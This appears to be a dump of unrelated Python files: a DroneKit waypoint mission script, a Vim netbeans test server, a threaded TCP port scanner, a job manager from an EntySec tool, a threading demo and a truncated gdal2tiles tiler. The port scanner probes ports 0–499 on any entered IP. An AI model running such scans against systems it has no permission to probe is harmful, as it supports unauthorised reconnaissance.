cmds.add(Command( 0, 0, 0, mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT, mavutil.mavlink.MAV_CMD_NAV_WAYPOINT, 0, 0, 0, 0, 0, 0, point4.lat, point4.lon, 14))
#add dummy waypoint "5" at point 4 (lets us know when have reached destination)
cmds.add(Command( 0, 0, 0, mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT, mavutil.mavlink.MAV_CMD_NAV_WAYPOINT, 0, 0, 0, 0, 0, 0, point4.lat, point4.lon, 14))
print(" Upload new commands to vehicle")
cmds.upload()
def arm_and_takeoff(aTargetAltitude):
"""
Arms vehicle and fly to aTargetAltitude.
"""
print("Basic pre-arm checks")
# Don't let the user try to arm until autopilot is ready
while not vehicle.is_armable:
print(" Waiting for vehicle to initialise...")
time.sleep(1)
print("Arming motors")
# Copter should arm in GUIDED mode
vehicle.mode = VehicleMode("GUIDED")
vehicle.armed = True
while not vehicle.armed:
print(" Waiting for arming...")
time.sleep(1)
print("Taking off!")
vehicle.simple_takeoff(aTargetAltitude) # Take off to target altitude
# Wait until the vehicle reaches a safe height before processing the goto (otherwise the command
# after Vehicle.simple_takeoff will execute immediately).
while True:
print(" Altitude: ", vehicle.location.global_relative_frame.alt)
if vehicle.location.global_relative_frame.alt>=aTargetAltitude*0.95: #Trigger just below target alt.
print("Reached target altitude")
break
time.sleep(1)
print('Create a new mission (for current location)')
adds_square_mission(vehicle.location.global_frame,50)
# From Copter 3.3 you will be able to take off using a mission item. Plane must take off using a mission item (currently).
arm_and_takeoff(10)
print("Starting mission")
# Reset mission set to first (0) waypoint
vehicle.commands.next=0
# Set mode to AUTO to start mission
vehicle.mode = VehicleMode("AUTO")
# Monitor mission.
# Demonstrates getting and setting the command number
# Uses distance_to_current_waypoint(), a convenience function for finding the
# distance to the next waypoint.
while True:
nextwaypoint=vehicle.commands.next
print('Distance to waypoint (%s): %s' % (nextwaypoint, distance_to_current_waypoint()))
if nextwaypoint==3: #Skip to next waypoint
print('Skipping to Waypoint 5 when reach waypoint 3')
vehicle.commands.next = 5
if nextwaypoint==5: #Dummy waypoint - as soon as we reach waypoint 4 this is true and we exit.
print("Exit 'standard' mission when start heading to final waypoint (5)")
break;
time.sleep(1)
print('Return to launch')
vehicle.mode = VehicleMode("RTL")
#Close vehicle object before exiting script
print("Close vehicle object")
vehicle.close()
# Shut down simulator if it was started.
if sitl is not None:
sitl.stop()
|
test_netbeans.py | #!/usr/bin/python
#
# Server that will communicate with Vim through the netbeans interface.
# Used by test_netbeans.vim.
#
# This requires Python 2.6 or later.
from __future__ import print_function
import socket
import sys
import time
import threading
try:
# Python 3
import socketserver
except ImportError:
# Python 2
import SocketServer as socketserver
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
print("=== socket opened ===")
while True:
try:
received = self.request.recv(4096).decode('utf-8')
except socket.error:
print("=== socket error ===")
break
except IOError:
print("=== socket closed ===")
break
if received == '':
print("=== socket closed ===")
break
print("received: {0}".format(received))
# Write the received line into the file, so that the test can check
# what happened.
with open("Xnetbeans", "a") as myfile:
myfile.write(received)
response = ''
if received.find('README.txt') > 0:
name = received.split('"')[1]
response = '5:putBufferNumber!33 "' + name + '"\n'
response += '5:setDot!1 3/19\n'
elif received.find('disconnect') > 0:
# we're done
self.server.shutdown()
return
if len(response) > 0:
self.request.sendall(response.encode('utf-8'))
# Write the respoinse into the file, so that the test can knows
# the command was sent.
with open("Xnetbeans", "a") as myfile:
myfile.write('send: ' + response)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def writePortInFile(port):
# Write the port number in Xportnr, so that the test knows it.
f = open("Xportnr", "w")
f.write("{0}".format(port))
f.close()
if __name__ == "__main__":
HOST, PORT = "localhost", 0
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
# Start a thread with the server. That thread will then start a new thread
# for each connection.
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
writePortInFile(port)
print("Listening on port {0}".format(port))
# Main thread terminates, but the server continues running
# until server.shutdown() is called.
try:
while server_thread.isAlive():
server_thread.join(1)
except (KeyboardInterrupt, SystemExit):
server.shutdown()
|
portscanner.py | # This script runs on Python 3
import socket, threading
import sys
import logging
def TCP_connect(ip, port_number, delay, output):
TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
TCPsock.settimeout(delay)
try:
TCPsock.connect((ip, port_number))
output[port_number] = 'Listening'
except:
output[port_number] = ''
def scan_ports(host_ip, delay):
threads = [] # To run TCP_connect concurrently
output = {} # For printing purposes
# Spawning threads to scan ports
logging.debug('appending threads')
for i in range(500):
t = threading.Thread(target=TCP_connect, args=(host_ip, i, delay, output))
threads.append(t)
# Starting threads
logging.debug('finished appending')
for i in range(500):
try:
logging.debug('starting thread %s', threads[i])
threads[i].start()
except RuntimeError:
print("Run time error:", sys.exc_info()[0])
raise
# Locking the script until all threads complete
for i in range(500):
threads[i].join()
# Printing listening ports from small to large
for i in range(500):
if output[i] == 'Listening':
print(str(i) + ': ' + output[i])
logging.basicConfig(
level=logging.DEBUG,
format='[%(levelname)s] (%(threadName)-10s) %(message)s',)
def run(target):
host_ip = target
delay = int(input("How many seconds the socket is going to wait until timeout: "))
print(target)
scan_ports(host_ip, delay)
def main():
host_ip = input("Enter host IP: ")
delay = int(input("How many seconds the socket is going to wait until timeout: "))
scan_ports(host_ip, delay)
if __name__ == "__main__":
main()
|
jobs.py | #!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import os
import sys
import ctypes
import threading
from core.exceptions import exceptions
from core.formatter import formatter
from core.badges import badges
from core.storage import storage
from core.modules import modules
class jobs():
def __init__(self):
self.exceptions = exceptions()
self.formatter = formatter()
self.badges = badges()
self.storage = storage()
self.modules = modules()
self.job_process = None
def stop_dead(self):
jobs = self.storage.get("jobs")
if jobs:
for job_id in list(jobs):
if not jobs[job_id]['job_process'].is_alive():
self.delete_job(job_id)
def check_jobs(self):
if not self.storage.get("jobs"):
return True
return False
def check_module_job(self, module_name):
jobs = self.storage.get("jobs")
if jobs:
for job_id in jobs.keys():
if jobs[job_id]['module_name'] == module_name:
return True
return False
def exit_jobs(self):
if self.check_jobs():
return True
self.badges.output_warning("You have some running jobs.")
if self.badges.input_question("Exit anyway? [y/N] ").lower() in ['yes', 'y']:
self.badges.output_process("Stopping all jobs...")
self.stop_all_jobs()
return True
return False
def stop_all_jobs(self):
if not self.check_jobs():
for job_id in list(self.storage.get("jobs").keys()):
self.delete_job(job_id)
def stop_job(self, job):
if job.is_alive():
exc = ctypes.py_object(SystemExit)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(job.ident), exc)
if res == 0:
raise self.exceptions.GlobalException
if res > 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(job.ident, None)
raise self.exceptions.GlobalException
def start_job(self, job_function, job_arguments):
self.job_process = threading.Thread(target=job_function, args=job_arguments)
self.job_process.setDaemon(True)
self.job_process.start()
def delete_job(self, job_id):
if not self.check_jobs():
job_id = int(job_id)
if job_id in list(self.storage.get("jobs").keys()):
try:
self.stop_job(self.storage.get("jobs")[job_id]['job_process'])
self.storage.delete_element("jobs", job_id)
except Exception:
self.badges.output_error("Failed to stop job!")
else:
self.badges.output_error("Invalid job id!")
else:
self.badges.output_error("Invalid job id!")
def create_job(self, job_name, module_name, job_function, job_arguments=()):
self.start_job(job_function, job_arguments)
if not self.storage.get("jobs"):
self.storage.set("jobs", dict())
job_id = len(self.storage.get("jobs"))
job_data = {
job_id: {
'job_name': job_name,
'module_name': module_name,
'job_process': self.job_process
}
}
self.storage.update("jobs", job_data)
return job_id
|
th.py | import threading as thread
import time
def TheTh(args=(), kwargs={}):
print('TheTh: hi')
print('TheTh:', repr(thread.currentThread().getName()))
time.sleep(3.0)
print('TheTh: bye')
def do():
theTh = thread.Thread(target=TheTh, name='TheTh', kwargs={})
print('do:', repr(theTh.getName()))
theTh.start()
time.sleep(4.0)
print('do: join')
theTh.join()
print('do: thread is dead')
|
gdal2tiles-multiprocess.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# ******************************************************************************
# $Id: gdal2tiles.py 27349 2014-05-16 18:58:51Z rouault $
#
# Project: Google Summer of Code 2007, 2008 (http://code.google.com/soc/)
# Support: BRGM (http://www.brgm.fr)
# Purpose: Convert a raster into TMS (Tile Map Service) tiles in a directory.
# - generate Google Earth metadata (KML SuperOverlay)
# - generate simple HTML viewer based on Google Maps and OpenLayers
# - support of global tiles (Spherical Mercator) for compatibility
# with interactive web maps a la Google Maps
# Author: Klokan Petr Pridal, klokan at klokan dot cz
# Web: http://www.klokan.cz/projects/gdal2tiles/
# GUI: http://www.maptiler.org/
#
###############################################################################
# Copyright (c) 2008, Klokan Petr Pridal
# Copyright (c) 2010-2013, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# ******************************************************************************
# Hacked to make changes to the stacking order.. spruceboy@gmail.com
import sys
try:
from osgeo import gdal
from osgeo import osr
except:
import gdal
print 'You are using "old gen" bindings. gdal2tiles needs "new gen" bindings.'
sys.exit(1)
import os
import math
try:
from PIL import Image
import numpy
import osgeo.gdal_array as gdalarray
except:
# 'antialias' resampling is not available
pass
import multiprocessing
import tempfile
from optparse import OptionParser, OptionGroup
__version__ = '$Id: gdal2tiles.py 27349 2014-05-16 18:58:51Z rouault $'
resampling_list = (
'average',
'near',
'bilinear',
'cubic',
'cubicspline',
'lanczos',
'antialias',
)
profile_list = ('mercator', 'geodetic', 'raster') # ,'zoomify')
webviewer_list = ('all', 'google', 'openlayers', 'none')
queue = multiprocessing.Queue()
# =============================================================================
# =============================================================================
# =============================================================================
__doc__globalmaptiles = \
"""
globalmaptiles.py
Global Map Tiles as defined in Tile Map Service (TMS) Profiles
==============================================================
Functions necessary for generation of global tiles used on the web.
It contains classes implementing coordinate conversions for:
- GlobalMercator (based on EPSG:900913 = EPSG:3785)
for Google Maps, Yahoo Maps, Bing Maps compatible tiles
- GlobalGeodetic (based on EPSG:4326)
for OpenLayers Base Map and Google Earth compatible tiles
More info at:
http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification
http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation
http://msdn.microsoft.com/en-us/library/bb259689.aspx
http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates
Created by Klokan Petr Pridal on 2008-07-03.
Google Summer of Code 2008, project GDAL2Tiles for OSGEO.
In case you use this class in your product, translate it to another language
or find it usefull for your project please let me know.
My email: klokan at klokan dot cz.
I would like to know where it was used.
Class is available under the open-source GDAL license (www.gdal.org).
"""
import math
MAXZOOMLEVEL = 32
class GlobalMercator(object):
"""
TMS Global Mercator Profile
---------------------------
Functions necessary for generation of tiles in Spherical Mercator projection,
EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001.
Such tiles are compatible with Google Maps, Bing Maps, Yahoo Maps,
UK Ordnance Survey OpenSpace API, ...
and you can overlay them on top of base maps of those web mapping applications.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Mercator tiles::
LatLon <-> Meters <-> Pixels <-> Tile
WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid
lat/lon XY in metres XY pixels Z zoom XYZ from TMS
EPSG:4326 EPSG:900913
.----. --------- -- TMS
/ \ <-> | | <-> /----/ <-> Google
\ / | | /--------/ QuadTree
----- --------- /------------/
KML, public WebMapService Web Clients TileMapService
What is the coordinate extent of Earth in EPSG:900913?
[-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244]
Constant 20037508.342789244 comes from the circumference of the Earth in meters,
which is 40 thousand kilometers, the coordinate origin is in the middle of extent.
In fact you can calculate the constant as: 2 * math.pi * 6378137 / 2.0
$ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913
Polar areas with abs(latitude) bigger then 85.05112878 are clipped off.
What are zoom level constants (pixels/meter) for pyramid with EPSG:900913?
whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile,
every lower zoom level resolution is always divided by two
initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062
What is the difference between TMS and Google Maps/QuadTree tile name convention?
The tile raster itself is the same (equal extent, projection, pixel size),
there is just different identification of the same raster tile.
Tiles in TMS are counted from [0,0] in the bottom-left corner, id is XYZ.
Google placed the origin [0,0] to the top-left corner, reference is XYZ.
Microsoft is referencing tiles by a QuadTree name, defined on the website:
http://msdn2.microsoft.com/en-us/library/bb259689.aspx
The lat/lon coordinates are using WGS84 datum, yeh?
Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum.
Well, the web clients like Google Maps are projecting those coordinates by
Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if
the were on the WGS84 ellipsoid.
From MSDN documentation:
To simplify the calculations, we use the spherical form of projection, not
the ellipsoidal form. Since the projection is used only for map display,
and not for displaying numeric coordinates, we don't need the extra precision
of an ellipsoidal projection. The spherical projection causes approximately
0.33 percent scale distortion in the Y direction, which is not visually noticable.
How do I create a raster in EPSG:900913 and convert coordinates with PROJ.4?
You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform.
All of the tools supports -t_srs 'epsg:900913'.
For other GIS programs check the exact definition of the projection:
More info at http://spatialreference.org/ref/user/google-projection/
The same projection is degined as EPSG:3785. WKT definition is in the official
EPSG database.
Proj4 Text:
+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0
+k=1.0 +units=m +nadgrids=@null +no_defs
Human readable WKT format of EPGS:900913:
PROJCS["Google Maps Global Mercator",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4326"]],
PROJECTION["Mercator_1SP"],
PARAMETER["central_meridian",0],
PARAMETER["scale_factor",1],
PARAMETER["false_easting",0],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]]]
"""
def __init__(self, tileSize=256):
'''Initialize the TMS Global Mercator pyramid'''
self.tileSize = tileSize
self.initialResolution = 2 * math.pi * 6378137 / self.tileSize
# 156543.03392804062 for tileSize 256 pixels
self.originShift = 2 * math.pi * 6378137 / 2.0
# 20037508.342789244
def LatLonToMeters(self, lat, lon):
'''Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:900913'''
mx = lon * self.originShift / 180.0
my = math.log(math.tan((90 + lat) * math.pi / 360.0)) \
/ (math.pi / 180.0)
my = my * self.originShift / 180.0
return (mx, my)
def MetersToLatLon(self, mx, my):
'''Converts XY point from Spherical Mercator EPSG:900913 to lat/lon in WGS84 Datum'''
lon = mx / self.originShift * 180.0
lat = my / self.originShift * 180.0
lat = 180 / math.pi * (2 * math.atan(math.exp(lat * math.pi
/ 180.0)) - math.pi / 2.0)
return (lat, lon)
def PixelsToMeters(
self,
px,
py,
zoom,
):
'''Converts pixel coordinates in given zoom level of pyramid to EPSG:900913'''
res = self.Resolution(zoom)
mx = px * res - self.originShift
my = py * res - self.originShift
return (mx, my)
def MetersToPixels(
self,
mx,
my,
zoom,
):
'''Converts EPSG:900913 to pyramid pixel coordinates in given zoom level'''
res = self.Resolution(zoom)
px = (mx + self.originShift) / res
py = (my + self.originShift) / res
return (px, py)
def PixelsToTile(self, px, py):
'''Returns a tile covering region in given pixel coordinates'''
tx = int(math.ceil(px / float(self.tileSize)) - 1)
ty = int(math.ceil(py / float(self.tileSize)) - 1)
return (tx, ty)
def PixelsToRaster(
self,
px,
py,
zoom,
):
'''Move the origin of pixel coordinates to top-left corner'''
mapSize = self.tileSize << zoom
return (px, mapSize - py)
def MetersToTile(
self,
mx,
my,
zoom,
):
'''Returns tile for given mercator coordinates'''
(px, py) = self.MetersToPixels(mx, my, zoom)
return self.PixelsToTile(px, py)
def TileBounds(
self,
tx,
ty,
zoom,
):
'''Returns bounds of the given tile in EPSG:900913 coordinates'''
(minx, miny) = self.PixelsToMeters(tx * self.tileSize, ty
* self.tileSize, zoom)
(maxx, maxy) = self.PixelsToMeters((tx + 1) * self.tileSize,
(ty + 1) * self.tileSize, zoom)
return (minx, miny, maxx, maxy)
def TileLatLonBounds(
self,
tx,
ty,
zoom,
):
'''Returns bounds of the given tile in latutude/longitude using WGS84 datum'''
bounds = self.TileBounds(tx, ty, zoom)
(minLat, minLon) = self.MetersToLatLon(bounds[0], bounds[1])
(maxLat, maxLon) = self.MetersToLatLon(bounds[2], bounds[3])
return (minLat, minLon, maxLat, maxLon)
def Resolution(self, zoom):
'''Resolution (meters/pixel) for given zoom level (measured at Equator)'''
# return (2 * math.pi * 6378137) / (self.tileSize * 2**zoom)
return self.initialResolution / 2 ** zoom
def ZoomForPixelSize(self, pixelSize):
'''Maximal scaledown zoom of the pyramid closest to the pixelSize.'''
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
if i != 0:
return i - 1
else:
return 0 # We don't want to scale up
def GoogleTile(
self,
tx,
ty,
zoom,
):
'''Converts TMS tile coordinates to Google Tile coordinates'''
# coordinate origin is moved from bottom-left to top-left corner of the extent
return (tx, 2 ** zoom - 1 - ty)
def QuadTree(
self,
tx,
ty,
zoom,
):
'''Converts TMS tile coordinates to Microsoft QuadTree'''
quadKey = ''
ty = 2 ** zoom - 1 - ty
for i in range(zoom, 0, -1):
digit = 0
mask = 1 << i - 1
if tx & mask != 0:
digit += 1
if ty & mask != 0:
digit += 2
quadKey += str(digit)
return quadKey
# ---------------------
class GlobalGeodetic(object):
"""
TMS Global Geodetic Profile
---------------------------
Functions necessary for generation of global tiles in Plate Carre projection,
EPSG:4326, "unprojected profile".
Such tiles are compatible with Google Earth (as any other EPSG:4326 rasters)
and you can overlay the tiles on top of OpenLayers base map.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Geodetic tiles?
Global Geodetic tiles are using geodetic coordinates (latitude,longitude)
directly as planar coordinates XY (it is also called Unprojected or Plate
Carre). We need only scaling to pixel pyramid and cutting to tiles.
Pyramid has on top level two tiles, so it is not square but rectangle.
Area [-180,-90,180,90] is scaled to 512x256 pixels.
TMS has coordinate origin (for pixels and tiles) in bottom-left corner.
Rasters are in EPSG:4326 and therefore are compatible with Google Earth.
LatLon <-> Pixels <-> Tiles
WGS84 coordinates Pixels in pyramid Tiles in pyramid
lat/lon XY pixels Z zoom XYZ from TMS
EPSG:4326
.----. ----
/ \ <-> /--------/ <-> TMS
\ / /--------------/
----- /--------------------/
WMS, KML Web Clients, Google Earth TileMapService
"""
def __init__(self, tmscompatible, tileSize=256):
self.tileSize = tileSize
if tmscompatible is not None:
# Defaults the resolution factor to 0.703125 (2 tiles @ level 0)
# Adhers to OSGeo TMS spec http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification#global-geodetic
self.resFact = 180.0 / self.tileSize
else:
# Defaults the resolution factor to 1.40625 (1 tile @ level 0)
# Adheres OpenLayers, MapProxy, etc default resolution for WMTS
self.resFact = 360.0 / self.tileSize
def LonLatToPixels(
self,
lon,
lat,
zoom,
):
'''Converts lon/lat to pixel coordinates in given zoom of the EPSG:4326 pyramid'''
res = self.resFact / 2 ** zoom
px = (180 + lon) / res
py = (90 + lat) / res
return (px, py)
def PixelsToTile(self, px, py):
'''Returns coordinates of the tile covering region in pixel coordinates'''
tx = int(math.ceil(px / float(self.tileSize)) - 1)
ty = int(math.ceil(py / float(self.tileSize)) - 1)
return (tx, ty)
def LonLatToTile(
self,
lon,
lat,
zoom,
):
'''Returns the tile for zoom which covers given lon/lat coordinates'''
(px, py) = self.LonLatToPixels(lon, lat, zoom)
return self.PixelsToTile(px, py)
def Resolution(self, zoom):
'''Resolution (arc/pixel) for given zoom level (measured at Equator)'''
return self.resFact / 2 ** zoom
# return 180 / float( 1 << (8+zoom) )
def ZoomForPixelSize(self, pixelSize):
'''Maximal scaledown zoom of the pyramid closest to the pixelSize.'''
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
if i != 0:
return i - 1
else:
return 0 # We don't want to scale up
def TileBounds(
self,
tx,
ty,
zoom,
):
'''Returns bounds of the given tile'''
res = self.resFact / 2 ** zoom
return (tx * self.tileSize * res - 180, ty * self.tileSize
* res - 90, (tx + 1) * self.tileSize * res - 180, (ty
+ 1) * self.tileSize * res - 90)
def TileLatLonBounds(
self,
tx,
ty,
zoom,
):
'''Returns bounds of the given tile in the SWNE form'''
b = self.TileBounds(tx, ty, zoom)
return (b[1], b[0], b[3], b[2])
# ---------------------
# TODO: Finish Zoomify implemtentation!!!
class Zoomify(object):
"""
Tiles compatible with the Zoomify viewer
----------------------------------------
"""
def __init__(
self,
width,
height,
tilesize=256,
tileformat='jpg',
):
"""Initialization of the Zoomify tile tree"""
self.tilesize = tilesize
self.tileformat = tileformat
imagesize = (width, height)
tiles = (math.ceil(width / tilesize), math.ceil(height
/ tilesize))
# Size (in tiles) for each tier of pyramid.
self.tierSizeInTiles = []
self.tierSizeInTiles.push(tiles)
# Image size in pixels for each pyramid tierself
self.tierImageSize = []
self.tierImageSize.append(imagesize)
while imagesize[0] > tilesize or imageSize[1] > tilesize:
imagesize = (math.floor(imagesize[0] / 2),
math.floor(imagesize[1] / 2))
tiles = (math.ceil(imagesize[0] / tilesize),
math.ceil(imagesize[1] / tilesize))
self.tierSizeInTiles.append(tiles)
self.tierImageSize.append(imagesize)
self.tierSizeInTiles.reverse()
self.tierImageSize.reverse()
# Depth of the Zoomify pyramid, number of tiers (zoom levels)
self.numberOfTiers = len(self.tierSizeInTiles)
# Number of tiles up to the given tier of pyramid.
self.tileCountUpToTier = []
self.tileCountUpToTier[0] = 0
for i in range(1, self.numberOfTiers + 1):
self.tileCountUpToTier.append(self.tierSizeInTiles[i
- 1][0] * self.tierSizeInTiles[i - 1][1]
+ self.tileCountUpToTier[i - 1])
def tilefilename(
self,
x,
y,
z,
):
"""Returns filename for tile with given coordinates"""
tileIndex = x + y * self.tierSizeInTiles[z][0] \
+ self.tileCountUpToTier[z]
return os.path.join('TileGroup%.0f' % math.floor(tileIndex
/ 256), '%s-%s-%s.%s' % (z, x, y,
self.tileformat))
# =============================================================================
# =============================================================================
# =============================================================================
class GDAL2Tiles(object):
# -------------------------------------------------------------------------
def process(self):
"""The main processing function, runs all the main steps of processing"""
# Opening and preprocessing of the input file
self.open_input()
# Generation of main metadata files and HTML viewers
self.generate_metadata()
# Generation of the lowest tiles
self.generate_base_tiles()
# Generation of the overview tiles (higher in the pyramid)
self.generate_overview_tiles()
# -------------------------------------------------------------------------
def error(self, msg, details=''):
"""print an error message and stop the processing"""
if details:
self.parser.error(msg + '''
''' + details)
else:
self.parser.error(msg)
# -------------------------------------------------------------------------
def progressbar(self, complete=0.0):
"""print progressbar for float value 0..1"""
gdal.TermProgress_nocb(complete)
# -------------------------------------------------------------------------
def stop(self):
"""Stop the rendering immediately"""
self.stopped = True
# -------------------------------------------------------------------------
def __init__(self, arguments):
"""Constructor function - initialization"""
self.stopped = False
self.input = None
self.output = None
# Tile format
self.tilesize = 256
self.tiledriver = 'PNG'
self.tileext = 'png'
# Should we read bigger window of the input raster and scale it down?
# Note: Modified leter by open_input()
# Not for 'near' resampling
# Not for Wavelet based drivers (JPEG2000, ECW, MrSID)
# Not for 'raster' profile
self.scaledquery = True
# How big should be query window be for scaling down
# Later on reset according the chosen resampling algorightm
self.querysize = 4 * self.tilesize
# Should we use Read on the input file for generating overview tiles?
# Note: Modified later by open_input()
# Otherwise the overview tiles are generated from existing underlying tiles
self.overviewquery = False
# RUN THE ARGUMENT PARSER:
self.optparse_init()
(self.options, self.args) = \
self.parser.parse_args(args=arguments)
if not self.args:
self.error('No input file specified')
# POSTPROCESSING OF PARSED ARGUMENTS:
# Workaround for old versions of GDAL
try:
if self.options.verbose and self.options.resampling \
== 'near' or gdal.TermProgress_nocb:
pass
except:
self.error('This version of GDAL is not supported. Please upgrade to 1.6+.'
)
# ,"You can try run crippled version of gdal2tiles with parameters: -v -r 'near'")
# Is output directory the last argument?
# Test output directory, if it doesn't exist
if os.path.isdir(self.args[-1]) or len(self.args) > 1 \
and not os.path.exists(self.args[-1]):
self.output = self.args[-1]
self.args = self.args[:-1]
# More files on the input not directly supported yet
if len(self.args) > 1:
self.error('Processing of several input files is not supported.'
,
"""Please first use a tool like gdal_vrtmerge.py or gdal_merge.py on the files:
gdal_vrtmerge.py -o merged.vrt %s"""
% ' '.join(self.args))
# TODO: Call functions from gdal_vrtmerge.py directly
self.input = self.args[0]
# Default values for not given options
if not self.output:
# Directory with input filename without extension in actual directory
self.output = \
os.path.splitext(os.path.basename(self.input))[0]
if not self.options.title:
self.options.title = os.path.basename(self.input)
if self.options.url and not self.options.url.endswith('/'):
self.options.url += '/'
if self.options.url:
self.options.url += os.path.basename(self.output) + '/'
# Supported options
self.resampling = None
if self.options.resampling == 'average':
try:
if gdal.RegenerateOverview:
pass
except:
self.error("'average' resampling algorithm is not available."
,
"Please use -r 'near' argument or upgrade to newer version of GDAL."
)
elif self.options.resampling == 'antialias':
try:
if numpy:
pass
except:
self.error("'antialias' resampling algorithm is not available."
,
'Install PIL (Python Imaging Library) and numpy.'
)
elif self.options.resampling == 'near':
self.resampling = gdal.GRA_NearestNeighbour
self.querysize = self.tilesize
elif self.options.resampling == 'bilinear':
self.resampling = gdal.GRA_Bilinear
self.querysize = self.tilesize * 2
elif self.options.resampling == 'cubic':
self.resampling = gdal.GRA_Cubic
elif self.options.resampling == 'cubicspline':
self.resampling = gdal.GRA_CubicSpline
elif self.options.resampling == 'lanczos':
self.resampling = gdal.GRA_Lanczos
# User specified zoom levels
self.tminz = None
self.tmaxz = None
if self.options.zoom:
minmax = self.options.zoom.split('-', 1)
minmax.extend([''])
(_min, _max) = minmax[:2]
self.tminz = int(_min)
if _max:
self.tmaxz = int(_max)
else:
self.tmaxz = int(_min)
if self.options.profile == 'raster':
if self.input:
self.in_ds = gdal.Open(self.input, gdal.GA_ReadOnly)
else:
raise Exception('No input file was specified')
log2 = lambda x: math.log10(x) / math.log10(2) # log2 (base 2 logarithm)
self.nativezoom = \
int(max(math.ceil(log2(self.in_ds.RasterXSize
/ float(self.tilesize))),
math.ceil(log2(self.in_ds.RasterYSize
/ float(self.tilesize)))))
if self.tmaxz < self.nativezoom:
self.tmaxz = self.nativezoom
if self.options.verbose:
print ('Native zoom of the raster:', self.nativezoom)
# Get the minimal zoom level (whole raster in one tile)
if self.tminz == None:
self.tminz = 0
# KML generation
self.kml = self.options.kml
# Output the results
if self.options.verbose:
print ('Options:', self.options)
print ('Input:', self.input)
print ('Output:', self.output)
print 'Cache: %s MB' % (gdal.GetCacheMax() / 1024 / 1024)
print ''
# -------------------------------------------------------------------------
def optparse_init(self):
"""Prepare the option parser for input (argv)"""
from optparse import OptionParser, OptionGroup
usage = 'Usage: %prog [options] input_file(s) [output]'
p = OptionParser(usage, version='%prog ' + __version__)
p.add_option(
'-p',
'--profile',
dest='profile',
type='choice',
choices=profile_list,
help="Tile cutting profile (%s) - default 'mercator' (Google Maps compatible)"
% ','.join(profile_list),
)
p.add_option(
'-r',
'--resampling',
dest='resampling',
type='choice',
choices=resampling_list,
help="Resampling method (%s) - default 'average'"
% ','.join(resampling_list),
)
p.add_option('-s', '--s_srs', dest='s_srs', metavar='SRS',
help='The spatial reference system used for the source input data'
)
p.add_option('-z', '--zoom', dest='zoom',
